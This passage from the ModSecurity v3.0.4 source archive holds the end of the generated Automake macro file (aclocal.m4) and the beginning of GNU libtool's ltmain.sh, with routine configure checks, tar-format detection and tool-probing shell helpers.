is bad on some platforms. AC_REQUIRE([AC_PROG_AWK])dnl AC_REQUIRE([AC_PROG_MAKE_SET])dnl AC_REQUIRE([AM_SET_LEADING_DOT])dnl _AM_IF_OPTION([tar-ustar], [_AM_PROG_TAR([ustar])], [_AM_IF_OPTION([tar-pax], [_AM_PROG_TAR([pax])], [_AM_PROG_TAR([v7])])]) _AM_IF_OPTION([no-dependencies],, [AC_PROVIDE_IFELSE([AC_PROG_CC], [_AM_DEPENDENCIES([CC])], [m4_define([AC_PROG_CC], m4_defn([AC_PROG_CC])[_AM_DEPENDENCIES([CC])])])dnl AC_PROVIDE_IFELSE([AC_PROG_CXX], [_AM_DEPENDENCIES([CXX])], [m4_define([AC_PROG_CXX], m4_defn([AC_PROG_CXX])[_AM_DEPENDENCIES([CXX])])])dnl AC_PROVIDE_IFELSE([AC_PROG_OBJC], [_AM_DEPENDENCIES([OBJC])], [m4_define([AC_PROG_OBJC], m4_defn([AC_PROG_OBJC])[_AM_DEPENDENCIES([OBJC])])])dnl AC_PROVIDE_IFELSE([AC_PROG_OBJCXX], [_AM_DEPENDENCIES([OBJCXX])], [m4_define([AC_PROG_OBJCXX], m4_defn([AC_PROG_OBJCXX])[_AM_DEPENDENCIES([OBJCXX])])])dnl ]) AC_REQUIRE([AM_SILENT_RULES])dnl dnl The testsuite driver may need to know about EXEEXT, so add the dnl 'am__EXEEXT' conditional if _AM_COMPILER_EXEEXT was seen. This dnl macro is hooked onto _AC_COMPILER_EXEEXT early, see below. AC_CONFIG_COMMANDS_PRE(dnl [m4_provide_if([_AM_COMPILER_EXEEXT], [AM_CONDITIONAL([am__EXEEXT], [test -n "$EXEEXT"])])])dnl # POSIX will say in a future version that running "rm -f" with no argument # is OK; and we want to be able to make that assumption in our Makefile # recipes. So use an aggressive probe to check that the usage we want is # actually supported "in the wild" to an acceptable degree. # See automake bug#10828. # To make any issue more visible, cause the running configure to be aborted # by default if the 'rm' program in use doesn't match our expectations; the # user can still override this though. if rm -f && rm -fr && rm -rf; then : OK; else cat >&2 <<'END' Oops! Your 'rm' program seems unable to run without file operands specified on the command line, even when the '-f' option is present. This is contrary to the behaviour of most rm programs out there, and not conforming with the upcoming POSIX standard: Please tell bug-automake@gnu.org about your system, including the value of your $PATH and any error possibly output before this message. This can help us improve future automake versions. END if test x"$ACCEPT_INFERIOR_RM_PROGRAM" = x"yes"; then echo 'Configuration will proceed anyway, since you have set the' >&2 echo 'ACCEPT_INFERIOR_RM_PROGRAM variable to "yes"' >&2 echo >&2 else cat >&2 <<'END' Aborting the configuration process, to ensure you take notice of the issue. You can download and install GNU coreutils to get an 'rm' implementation that behaves properly: . If you want to complete the configuration process using your problematic 'rm' anyway, export the environment variable ACCEPT_INFERIOR_RM_PROGRAM to "yes", and re-run configure. END AC_MSG_ERROR([Your 'rm' program is bad, sorry.]) fi fi dnl The trailing newline in this macro's definition is deliberate, for dnl backward compatibility and to allow trailing 'dnl'-style comments dnl after the AM_INIT_AUTOMAKE invocation. See automake bug#16841. ]) dnl Hook into '_AC_COMPILER_EXEEXT' early to learn its expansion. Do not dnl add the conditional right here, as _AC_COMPILER_EXEEXT may be further dnl mangled by Autoconf and run in a shell conditional statement. m4_define([_AC_COMPILER_EXEEXT], m4_defn([_AC_COMPILER_EXEEXT])[m4_provide([_AM_COMPILER_EXEEXT])]) # When config.status generates a header, we must update the stamp-h file. # This file resides in the same directory as the config header # that is generated. The stamp files are numbered to have different names. # Autoconf calls _AC_AM_CONFIG_HEADER_HOOK (when defined) in the # loop where config.status creates the headers, so we can generate # our stamp files there. AC_DEFUN([_AC_AM_CONFIG_HEADER_HOOK], [# Compute $1's index in $config_headers. _am_arg=$1 _am_stamp_count=1 for _am_header in $config_headers :; do case $_am_header in $_am_arg | $_am_arg:* ) break ;; * ) _am_stamp_count=`expr $_am_stamp_count + 1` ;; esac done echo "timestamp for $_am_arg" >`AS_DIRNAME(["$_am_arg"])`/stamp-h[]$_am_stamp_count]) # Copyright (C) 2001-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_PROG_INSTALL_SH # ------------------ # Define $install_sh. AC_DEFUN([AM_PROG_INSTALL_SH], [AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl if test x"${install_sh+set}" != xset; then case $am_aux_dir in *\ * | *\ *) install_sh="\${SHELL} '$am_aux_dir/install-sh'" ;; *) install_sh="\${SHELL} $am_aux_dir/install-sh" esac fi AC_SUBST([install_sh])]) # Copyright (C) 2003-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # Check whether the underlying file-system supports filenames # with a leading dot. For instance MS-DOS doesn't. AC_DEFUN([AM_SET_LEADING_DOT], [rm -rf .tst 2>/dev/null mkdir .tst 2>/dev/null if test -d .tst; then am__leading_dot=. else am__leading_dot=_ fi rmdir .tst 2>/dev/null AC_SUBST([am__leading_dot])]) # Check to see how 'make' treats includes. -*- Autoconf -*- # Copyright (C) 2001-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_MAKE_INCLUDE() # ----------------- # Check whether make has an 'include' directive that can support all # the idioms we need for our automatic dependency tracking code. AC_DEFUN([AM_MAKE_INCLUDE], [AC_MSG_CHECKING([whether ${MAKE-make} supports the include directive]) cat > confinc.mk << 'END' am__doit: @echo this is the am__doit target >confinc.out .PHONY: am__doit END am__include="#" am__quote= # BSD make does it like this. echo '.include "confinc.mk" # ignored' > confmf.BSD # Other make implementations (GNU, Solaris 10, AIX) do it like this. echo 'include confinc.mk # ignored' > confmf.GNU _am_result=no for s in GNU BSD; do AM_RUN_LOG([${MAKE-make} -f confmf.$s && cat confinc.out]) AS_CASE([$?:`cat confinc.out 2>/dev/null`], ['0:this is the am__doit target'], [AS_CASE([$s], [BSD], [am__include='.include' am__quote='"'], [am__include='include' am__quote=''])]) if test "$am__include" != "#"; then _am_result="yes ($s style)" break fi done rm -f confinc.* confmf.* AC_MSG_RESULT([${_am_result}]) AC_SUBST([am__include])]) AC_SUBST([am__quote])]) # Fake the existence of programs that GNU maintainers use. -*- Autoconf -*- # Copyright (C) 1997-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_MISSING_PROG(NAME, PROGRAM) # ------------------------------ AC_DEFUN([AM_MISSING_PROG], [AC_REQUIRE([AM_MISSING_HAS_RUN]) $1=${$1-"${am_missing_run}$2"} AC_SUBST($1)]) # AM_MISSING_HAS_RUN # ------------------ # Define MISSING if not defined so far and test if it is modern enough. # If it is, set am_missing_run to use it, otherwise, to nothing. AC_DEFUN([AM_MISSING_HAS_RUN], [AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl AC_REQUIRE_AUX_FILE([missing])dnl if test x"${MISSING+set}" != xset; then case $am_aux_dir in *\ * | *\ *) MISSING="\${SHELL} \"$am_aux_dir/missing\"" ;; *) MISSING="\${SHELL} $am_aux_dir/missing" ;; esac fi # Use eval to expand $SHELL if eval "$MISSING --is-lightweight"; then am_missing_run="$MISSING " else am_missing_run= AC_MSG_WARN(['missing' script is too old or missing]) fi ]) # Helper functions for option handling. -*- Autoconf -*- # Copyright (C) 2001-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # _AM_MANGLE_OPTION(NAME) # ----------------------- AC_DEFUN([_AM_MANGLE_OPTION], [[_AM_OPTION_]m4_bpatsubst($1, [[^a-zA-Z0-9_]], [_])]) # _AM_SET_OPTION(NAME) # -------------------- # Set option NAME. Presently that only means defining a flag for this option. AC_DEFUN([_AM_SET_OPTION], [m4_define(_AM_MANGLE_OPTION([$1]), [1])]) # _AM_SET_OPTIONS(OPTIONS) # ------------------------ # OPTIONS is a space-separated list of Automake options. AC_DEFUN([_AM_SET_OPTIONS], [m4_foreach_w([_AM_Option], [$1], [_AM_SET_OPTION(_AM_Option)])]) # _AM_IF_OPTION(OPTION, IF-SET, [IF-NOT-SET]) # ------------------------------------------- # Execute IF-SET if OPTION is set, IF-NOT-SET otherwise. AC_DEFUN([_AM_IF_OPTION], [m4_ifset(_AM_MANGLE_OPTION([$1]), [$2], [$3])]) # Copyright (C) 1999-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # _AM_PROG_CC_C_O # --------------- # Like AC_PROG_CC_C_O, but changed for automake. We rewrite AC_PROG_CC # to automatically call this. AC_DEFUN([_AM_PROG_CC_C_O], [AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl AC_REQUIRE_AUX_FILE([compile])dnl AC_LANG_PUSH([C])dnl AC_CACHE_CHECK( [whether $CC understands -c and -o together], [am_cv_prog_cc_c_o], [AC_LANG_CONFTEST([AC_LANG_PROGRAM([])]) # Make sure it works both with $CC and with simple cc. # Following AC_PROG_CC_C_O, we do the test twice because some # compilers refuse to overwrite an existing .o file with -o, # though they will create one. am_cv_prog_cc_c_o=yes for am_i in 1 2; do if AM_RUN_LOG([$CC -c conftest.$ac_ext -o conftest2.$ac_objext]) \ && test -f conftest2.$ac_objext; then : OK else am_cv_prog_cc_c_o=no break fi done rm -f core conftest* unset am_i]) if test "$am_cv_prog_cc_c_o" != yes; then # Losing compiler, so override with the script. # FIXME: It is wrong to rewrite CC. # But if we don't then we get into trouble of one sort or another. # A longer-term fix would be to have automake use am__CC in this case, # and then we could set am__CC="\$(top_srcdir)/compile \$(CC)" CC="$am_aux_dir/compile $CC" fi AC_LANG_POP([C])]) # For backward compatibility. AC_DEFUN_ONCE([AM_PROG_CC_C_O], [AC_REQUIRE([AC_PROG_CC])]) # Copyright (C) 2001-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_RUN_LOG(COMMAND) # ------------------- # Run COMMAND, save the exit status in ac_status, and log it. # (This has been adapted from Autoconf's _AC_RUN_LOG macro.) AC_DEFUN([AM_RUN_LOG], [{ echo "$as_me:$LINENO: $1" >&AS_MESSAGE_LOG_FD ($1) >&AS_MESSAGE_LOG_FD 2>&AS_MESSAGE_LOG_FD ac_status=$? echo "$as_me:$LINENO: \$? = $ac_status" >&AS_MESSAGE_LOG_FD (exit $ac_status); }]) # Check to make sure that the build environment is sane. -*- Autoconf -*- # Copyright (C) 1996-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_SANITY_CHECK # --------------- AC_DEFUN([AM_SANITY_CHECK], [AC_MSG_CHECKING([whether build environment is sane]) # Reject unsafe characters in $srcdir or the absolute working directory # name. Accept space and tab only in the latter. am_lf=' ' case `pwd` in *[[\\\"\#\$\&\'\`$am_lf]]*) AC_MSG_ERROR([unsafe absolute working directory name]);; esac case $srcdir in *[[\\\"\#\$\&\'\`$am_lf\ \ ]]*) AC_MSG_ERROR([unsafe srcdir value: '$srcdir']);; esac # Do 'set' in a subshell so we don't clobber the current shell's # arguments. Must try -L first in case configure is actually a # symlink; some systems play weird games with the mod time of symlinks # (eg FreeBSD returns the mod time of the symlink's containing # directory). if ( am_has_slept=no for am_try in 1 2; do echo "timestamp, slept: $am_has_slept" > conftest.file set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null` if test "$[*]" = "X"; then # -L didn't work. set X `ls -t "$srcdir/configure" conftest.file` fi if test "$[*]" != "X $srcdir/configure conftest.file" \ && test "$[*]" != "X conftest.file $srcdir/configure"; then # If neither matched, then we have a broken ls. This can happen # if, for instance, CONFIG_SHELL is bash and it inherits a # broken ls alias from the environment. This has actually # happened. Such a system could not be considered "sane". AC_MSG_ERROR([ls -t appears to fail. Make sure there is not a broken alias in your environment]) fi if test "$[2]" = conftest.file || test $am_try -eq 2; then break fi # Just in case. sleep 1 am_has_slept=yes done test "$[2]" = conftest.file ) then # Ok. : else AC_MSG_ERROR([newly created file is older than distributed files! Check your system clock]) fi AC_MSG_RESULT([yes]) # If we didn't sleep, we still need to ensure time stamps of config.status and # generated files are strictly newer. am_sleep_pid= if grep 'slept: no' conftest.file >/dev/null 2>&1; then ( sleep 1 ) & am_sleep_pid=$! fi AC_CONFIG_COMMANDS_PRE( [AC_MSG_CHECKING([that generated files are newer than configure]) if test -n "$am_sleep_pid"; then # Hide warnings about reused PIDs. wait $am_sleep_pid 2>/dev/null fi AC_MSG_RESULT([done])]) rm -f conftest.file ]) # Copyright (C) 2009-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_SILENT_RULES([DEFAULT]) # -------------------------- # Enable less verbose build rules; with the default set to DEFAULT # ("yes" being less verbose, "no" or empty being verbose). AC_DEFUN([AM_SILENT_RULES], [AC_ARG_ENABLE([silent-rules], [dnl AS_HELP_STRING( [--enable-silent-rules], [less verbose build output (undo: "make V=1")]) AS_HELP_STRING( [--disable-silent-rules], [verbose build output (undo: "make V=0")])dnl ]) case $enable_silent_rules in @%:@ ((( yes) AM_DEFAULT_VERBOSITY=0;; no) AM_DEFAULT_VERBOSITY=1;; *) AM_DEFAULT_VERBOSITY=m4_if([$1], [yes], [0], [1]);; esac dnl dnl A few 'make' implementations (e.g., NonStop OS and NextStep) dnl do not support nested variable expansions. dnl See automake bug#9928 and bug#10237. am_make=${MAKE-make} AC_CACHE_CHECK([whether $am_make supports nested variables], [am_cv_make_support_nested_variables], [if AS_ECHO([['TRUE=$(BAR$(V)) BAR0=false BAR1=true V=1 am__doit: @$(TRUE) .PHONY: am__doit']]) | $am_make -f - >/dev/null 2>&1; then am_cv_make_support_nested_variables=yes else am_cv_make_support_nested_variables=no fi]) if test $am_cv_make_support_nested_variables = yes; then dnl Using '$V' instead of '$(V)' breaks IRIX make. AM_V='$(V)' AM_DEFAULT_V='$(AM_DEFAULT_VERBOSITY)' else AM_V=$AM_DEFAULT_VERBOSITY AM_DEFAULT_V=$AM_DEFAULT_VERBOSITY fi AC_SUBST([AM_V])dnl AM_SUBST_NOTMAKE([AM_V])dnl AC_SUBST([AM_DEFAULT_V])dnl AM_SUBST_NOTMAKE([AM_DEFAULT_V])dnl AC_SUBST([AM_DEFAULT_VERBOSITY])dnl AM_BACKSLASH='\' AC_SUBST([AM_BACKSLASH])dnl _AM_SUBST_NOTMAKE([AM_BACKSLASH])dnl ]) # Copyright (C) 2001-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # AM_PROG_INSTALL_STRIP # --------------------- # One issue with vendor 'install' (even GNU) is that you can't # specify the program used to strip binaries. This is especially # annoying in cross-compiling environments, where the build's strip # is unlikely to handle the host's binaries. # Fortunately install-sh will honor a STRIPPROG variable, so we # always use install-sh in "make install-strip", and initialize # STRIPPROG with the value of the STRIP variable (set by the user). AC_DEFUN([AM_PROG_INSTALL_STRIP], [AC_REQUIRE([AM_PROG_INSTALL_SH])dnl # Installed binaries are usually stripped using 'strip' when the user # run "make install-strip". However 'strip' might not be the right # tool to use in cross-compilation environments, therefore Automake # will honor the 'STRIP' environment variable to overrule this program. dnl Don't test for $cross_compiling = yes, because it might be 'maybe'. if test "$cross_compiling" != no; then AC_CHECK_TOOL([STRIP], [strip], :) fi INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" AC_SUBST([INSTALL_STRIP_PROGRAM])]) # Copyright (C) 2006-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # _AM_SUBST_NOTMAKE(VARIABLE) # --------------------------- # Prevent Automake from outputting VARIABLE = @VARIABLE@ in Makefile.in. # This macro is traced by Automake. AC_DEFUN([_AM_SUBST_NOTMAKE]) # AM_SUBST_NOTMAKE(VARIABLE) # -------------------------- # Public sister of _AM_SUBST_NOTMAKE. AC_DEFUN([AM_SUBST_NOTMAKE], [_AM_SUBST_NOTMAKE($@)]) # Check how to create a tarball. -*- Autoconf -*- # Copyright (C) 2004-2018 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # _AM_PROG_TAR(FORMAT) # -------------------- # Check how to create a tarball in format FORMAT. # FORMAT should be one of 'v7', 'ustar', or 'pax'. # # Substitute a variable $(am__tar) that is a command # writing to stdout a FORMAT-tarball containing the directory # $tardir. # tardir=directory && $(am__tar) > result.tar # # Substitute a variable $(am__untar) that extract such # a tarball read from stdin. # $(am__untar) < result.tar # AC_DEFUN([_AM_PROG_TAR], [# Always define AMTAR for backward compatibility. Yes, it's still used # in the wild :-( We should find a proper way to deprecate it ... AC_SUBST([AMTAR], ['$${TAR-tar}']) # We'll loop over all known methods to create a tar archive until one works. _am_tools='gnutar m4_if([$1], [ustar], [plaintar]) pax cpio none' m4_if([$1], [v7], [am__tar='$${TAR-tar} chof - "$$tardir"' am__untar='$${TAR-tar} xf -'], [m4_case([$1], [ustar], [# The POSIX 1988 'ustar' format is defined with fixed-size fields. # There is notably a 21 bits limit for the UID and the GID. In fact, # the 'pax' utility can hang on bigger UID/GID (see automake bug#8343 # and bug#13588). am_max_uid=2097151 # 2^21 - 1 am_max_gid=$am_max_uid # The $UID and $GID variables are not portable, so we need to resort # to the POSIX-mandated id(1) utility. Errors in the 'id' calls # below are definitely unexpected, so allow the users to see them # (that is, avoid stderr redirection). am_uid=`id -u || echo unknown` am_gid=`id -g || echo unknown` AC_MSG_CHECKING([whether UID '$am_uid' is supported by ustar format]) if test $am_uid -le $am_max_uid; then AC_MSG_RESULT([yes]) else AC_MSG_RESULT([no]) _am_tools=none fi AC_MSG_CHECKING([whether GID '$am_gid' is supported by ustar format]) if test $am_gid -le $am_max_gid; then AC_MSG_RESULT([yes]) else AC_MSG_RESULT([no]) _am_tools=none fi], [pax], [], [m4_fatal([Unknown tar format])]) AC_MSG_CHECKING([how to create a $1 tar archive]) # Go ahead even if we have the value already cached. We do so because we # need to set the values for the 'am__tar' and 'am__untar' variables. _am_tools=${am_cv_prog_tar_$1-$_am_tools} for _am_tool in $_am_tools; do case $_am_tool in gnutar) for _am_tar in tar gnutar gtar; do AM_RUN_LOG([$_am_tar --version]) && break done am__tar="$_am_tar --format=m4_if([$1], [pax], [posix], [$1]) -chf - "'"$$tardir"' am__tar_="$_am_tar --format=m4_if([$1], [pax], [posix], [$1]) -chf - "'"$tardir"' am__untar="$_am_tar -xf -" ;; plaintar) # Must skip GNU tar: if it does not support --format= it doesn't create # ustar tarball either. (tar --version) >/dev/null 2>&1 && continue am__tar='tar chf - "$$tardir"' am__tar_='tar chf - "$tardir"' am__untar='tar xf -' ;; pax) am__tar='pax -L -x $1 -w "$$tardir"' am__tar_='pax -L -x $1 -w "$tardir"' am__untar='pax -r' ;; cpio) am__tar='find "$$tardir" -print | cpio -o -H $1 -L' am__tar_='find "$tardir" -print | cpio -o -H $1 -L' am__untar='cpio -i -H $1 -d' ;; none) am__tar=false am__tar_=false am__untar=false ;; esac # If the value was cached, stop now. We just wanted to have am__tar # and am__untar set. test -n "${am_cv_prog_tar_$1}" && break # tar/untar a dummy directory, and stop if the command works. rm -rf conftest.dir mkdir conftest.dir echo GrepMe > conftest.dir/file AM_RUN_LOG([tardir=conftest.dir && eval $am__tar_ >conftest.tar]) rm -rf conftest.dir if test -s conftest.tar; then AM_RUN_LOG([$am__untar /dev/null 2>&1 && break fi done rm -rf conftest.dir AC_CACHE_VAL([am_cv_prog_tar_$1], [am_cv_prog_tar_$1=$_am_tool]) AC_MSG_RESULT([$am_cv_prog_tar_$1])]) AC_SUBST([am__tar]) AC_SUBST([am__untar]) ]) # _AM_PROG_TAR m4_include([build/ax_prog_doxygen.m4]) m4_include([build/ax_valgrind_check.m4]) m4_include([build/curl.m4]) m4_include([build/libgeoip.m4]) m4_include([build/libmaxmind.m4]) m4_include([build/libtool.m4]) m4_include([build/libxml.m4]) m4_include([build/lmdb.m4]) m4_include([build/ltoptions.m4]) m4_include([build/ltsugar.m4]) m4_include([build/ltversion.m4]) m4_include([build/lt~obsolete.m4]) m4_include([build/lua.m4]) m4_include([build/pcre.m4]) m4_include([build/ssdeep.m4]) m4_include([build/yajl.m4]) modsecurity-v3.0.4/ltmain.sh0000644000175000017500000120671413607066334016350 0ustar zimmerlezimmerle#! /bin/sh ## DO NOT EDIT - This file generated from ./build-aux/ltmain.in ## by inline-source v2018-07-24.06 # libtool (GNU libtool) 2.4.6.42-b88ce # Provide generalized library-building support services. # Written by Gordon Matzigkeit , 1996 # Copyright (C) 1996-2018 Free Software Foundation, Inc. # This is free software; see the source for copying conditions. There is NO # warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # GNU Libtool is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # As a special exception to the GNU General Public License, # if you distribute this file as part of a program or library that # is built using GNU Libtool, you may include this file under the # same distribution terms that you use for the rest of that program. # # GNU Libtool is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . PROGRAM=libtool PACKAGE=libtool VERSION=2.4.6.42-b88ce package_revision=2.4.6.42 ## ------ ## ## Usage. ## ## ------ ## # Run './libtool --help' for help with using this script from the # command line. ## ------------------------------- ## ## User overridable command paths. ## ## ------------------------------- ## # After configure completes, it has a better idea of some of the # shell tools we need than the defaults used by the functions shared # with bootstrap, so set those here where they can still be over- # ridden by the user, but otherwise take precedence. : ${AUTOCONF="autoconf"} : ${AUTOMAKE="automake"} ## -------------------------- ## ## Source external libraries. ## ## -------------------------- ## # Much of our low-level functionality needs to be sourced from external # libraries, which are installed to $pkgauxdir. # Set a version string for this script. scriptversion=2018-07-24.06; # UTC # General shell script boiler plate, and helper functions. # Written by Gary V. Vaughan, 2004 # This is free software. There is NO warranty; not even for # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # Copyright (C) 2004-2018 Bootstrap Authors # # This file is dual licensed under the terms of the MIT license # , and GPL version 3 or later # . You must apply one of # these licenses when using or redistributing this software or any of # the files within it. See the URLs above, or the file `LICENSE` # included in the Bootstrap distribution for the full license texts. # Please report bugs or propose patches to: # ## ------ ## ## Usage. ## ## ------ ## # Evaluate this file near the top of your script to gain access to # the functions and variables defined here: # # . `echo "$0" | ${SED-sed} 's|[^/]*$||'`/build-aux/funclib.sh # # If you need to override any of the default environment variable # settings, do that before evaluating this file. ## -------------------- ## ## Shell normalisation. ## ## -------------------- ## # Some shells need a little help to be as Bourne compatible as possible. # Before doing anything else, make sure all that help has been provided! DUALCASE=1; export DUALCASE # for MKS sh if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : emulate sh NULLCMD=: # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which # is contrary to our usage. Disable this feature. alias -g '${1+"$@"}'='"$@"' setopt NO_GLOB_SUBST else case `(set -o) 2>/dev/null` in *posix*) set -o posix ;; esac fi # NLS nuisances: We save the old values in case they are required later. _G_user_locale= _G_safe_locale= for _G_var in LANG LANGUAGE LC_ALL LC_CTYPE LC_COLLATE LC_MESSAGES do eval "if test set = \"\${$_G_var+set}\"; then save_$_G_var=\$$_G_var $_G_var=C export $_G_var _G_user_locale=\"$_G_var=\\\$save_\$_G_var; \$_G_user_locale\" _G_safe_locale=\"$_G_var=C; \$_G_safe_locale\" fi" done # Make sure IFS has a sensible default sp=' ' nl=' ' IFS="$sp $nl" # There are apparently some retarded systems that use ';' as a PATH separator! if test "${PATH_SEPARATOR+set}" != set; then PATH_SEPARATOR=: (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || PATH_SEPARATOR=';' } fi # func_unset VAR # -------------- # Portably unset VAR. # In some shells, an 'unset VAR' statement leaves a non-zero return # status if VAR is already unset, which might be problematic if the # statement is used at the end of a function (thus poisoning its return # value) or when 'set -e' is active (causing even a spurious abort of # the script in this case). func_unset () { { eval $1=; (eval unset $1) >/dev/null 2>&1 && eval unset $1 || : ; } } # Make sure CDPATH doesn't cause `cd` commands to output the target dir. func_unset CDPATH # Make sure ${,E,F}GREP behave sanely. func_unset GREP_OPTIONS ## ------------------------- ## ## Locate command utilities. ## ## ------------------------- ## # func_executable_p FILE # ---------------------- # Check that FILE is an executable regular file. func_executable_p () { test -f "$1" && test -x "$1" } # func_path_progs PROGS_LIST CHECK_FUNC [PATH] # -------------------------------------------- # Search for either a program that responds to --version with output # containing "GNU", or else returned by CHECK_FUNC otherwise, by # trying all the directories in PATH with each of the elements of # PROGS_LIST. # # CHECK_FUNC should accept the path to a candidate program, and # set $func_check_prog_result if it truncates its output less than # $_G_path_prog_max characters. func_path_progs () { _G_progs_list=$1 _G_check_func=$2 _G_PATH=${3-"$PATH"} _G_path_prog_max=0 _G_path_prog_found=false _G_save_IFS=$IFS; IFS=${PATH_SEPARATOR-:} for _G_dir in $_G_PATH; do IFS=$_G_save_IFS test -z "$_G_dir" && _G_dir=. for _G_prog_name in $_G_progs_list; do for _exeext in '' .EXE; do _G_path_prog=$_G_dir/$_G_prog_name$_exeext func_executable_p "$_G_path_prog" || continue case `"$_G_path_prog" --version 2>&1` in *GNU*) func_path_progs_result=$_G_path_prog _G_path_prog_found=: ;; *) $_G_check_func $_G_path_prog func_path_progs_result=$func_check_prog_result ;; esac $_G_path_prog_found && break 3 done done done IFS=$_G_save_IFS test -z "$func_path_progs_result" && { echo "no acceptable sed could be found in \$PATH" >&2 exit 1 } } # We want to be able to use the functions in this file before configure # has figured out where the best binaries are kept, which means we have # to search for them ourselves - except when the results are already set # where we skip the searches. # Unless the user overrides by setting SED, search the path for either GNU # sed, or the sed that truncates its output the least. test -z "$SED" && { _G_sed_script=s/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb/ for _G_i in 1 2 3 4 5 6 7; do _G_sed_script=$_G_sed_script$nl$_G_sed_script done echo "$_G_sed_script" 2>/dev/null | sed 99q >conftest.sed _G_sed_script= func_check_prog_sed () { _G_path_prog=$1 _G_count=0 printf 0123456789 >conftest.in while : do cat conftest.in conftest.in >conftest.tmp mv conftest.tmp conftest.in cp conftest.in conftest.nl echo '' >> conftest.nl "$_G_path_prog" -f conftest.sed conftest.out 2>/dev/null || break diff conftest.out conftest.nl >/dev/null 2>&1 || break _G_count=`expr $_G_count + 1` if test "$_G_count" -gt "$_G_path_prog_max"; then # Best one so far, save it but keep looking for a better one func_check_prog_result=$_G_path_prog _G_path_prog_max=$_G_count fi # 10*(2^10) chars as input seems more than enough test 10 -lt "$_G_count" && break done rm -f conftest.in conftest.tmp conftest.nl conftest.out } func_path_progs "sed gsed" func_check_prog_sed "$PATH:/usr/xpg4/bin" rm -f conftest.sed SED=$func_path_progs_result } # Unless the user overrides by setting GREP, search the path for either GNU # grep, or the grep that truncates its output the least. test -z "$GREP" && { func_check_prog_grep () { _G_path_prog=$1 _G_count=0 _G_path_prog_max=0 printf 0123456789 >conftest.in while : do cat conftest.in conftest.in >conftest.tmp mv conftest.tmp conftest.in cp conftest.in conftest.nl echo 'GREP' >> conftest.nl "$_G_path_prog" -e 'GREP$' -e '-(cannot match)-' conftest.out 2>/dev/null || break diff conftest.out conftest.nl >/dev/null 2>&1 || break _G_count=`expr $_G_count + 1` if test "$_G_count" -gt "$_G_path_prog_max"; then # Best one so far, save it but keep looking for a better one func_check_prog_result=$_G_path_prog _G_path_prog_max=$_G_count fi # 10*(2^10) chars as input seems more than enough test 10 -lt "$_G_count" && break done rm -f conftest.in conftest.tmp conftest.nl conftest.out } func_path_progs "grep ggrep" func_check_prog_grep "$PATH:/usr/xpg4/bin" GREP=$func_path_progs_result } ## ------------------------------- ## ## User overridable command paths. ## ## ------------------------------- ## # All uppercase variable names are used for environment variables. These # variables can be overridden by the user before calling a script that # uses them if a suitable command of that name is not already available # in the command search PATH. : ${CP="cp -f"} : ${ECHO="printf %s\n"} : ${EGREP="$GREP -E"} : ${FGREP="$GREP -F"} : ${LN_S="ln -s"} : ${MAKE="make"} : ${MKDIR="mkdir"} : ${MV="mv -f"} : ${RM="rm -f"} : ${SHELL="${CONFIG_SHELL-/bin/sh}"} ## -------------------- ## ## Useful sed snippets. ## ## -------------------- ## sed_dirname='s|/[^/]*$||' sed_basename='s|^.*/||' # Sed substitution that helps us do robust quoting. It backslashifies # metacharacters that are still active within double-quoted strings. sed_quote_subst='s|\([`"$\\]\)|\\\1|g' # Same as above, but do not quote variable references. sed_double_quote_subst='s/\(["`\\]\)/\\\1/g' # Sed substitution that turns a string into a regex matching for the # string literally. sed_make_literal_regex='s|[].[^$\\*\/]|\\&|g' # Sed substitution that converts a w32 file name or path # that contains forward slashes, into one that contains # (escaped) backslashes. A very naive implementation. sed_naive_backslashify='s|\\\\*|\\|g;s|/|\\|g;s|\\|\\\\|g' # Re-'\' parameter expansions in output of sed_double_quote_subst that # were '\'-ed in input to the same. If an odd number of '\' preceded a # '$' in input to sed_double_quote_subst, that '$' was protected from # expansion. Since each input '\' is now two '\'s, look for 